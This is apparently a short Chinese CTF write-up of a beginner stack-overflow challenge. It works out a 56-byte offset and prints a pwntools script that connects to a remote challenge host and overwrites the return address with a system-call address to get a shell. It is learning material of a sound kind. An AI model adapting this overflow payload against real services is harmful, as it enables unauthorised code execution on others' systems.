【记录】初试栈溢出

某ku的。。 虽然题目很简单,但是大家尽量自己尝试一下

分析一下源程序。

Checksec:

在main函数中看到将输入的数据放到了s中,查看一下s

0x30换成10进制 也就是48个字符,加上ret和ebp 一共8位 ,所以 56个字符就会溢出。

然后找system函数的地址。。0x400769

Exp如下。。。

from pwn import *

r=remote(“114.116.54.89”,“10003”)

a=“A”*56

key=0x400769

payload=a+p64(key)

r.send(payload)

r.interactive()

发表评论

电子邮件地址不会被公开。 必填项已用*标注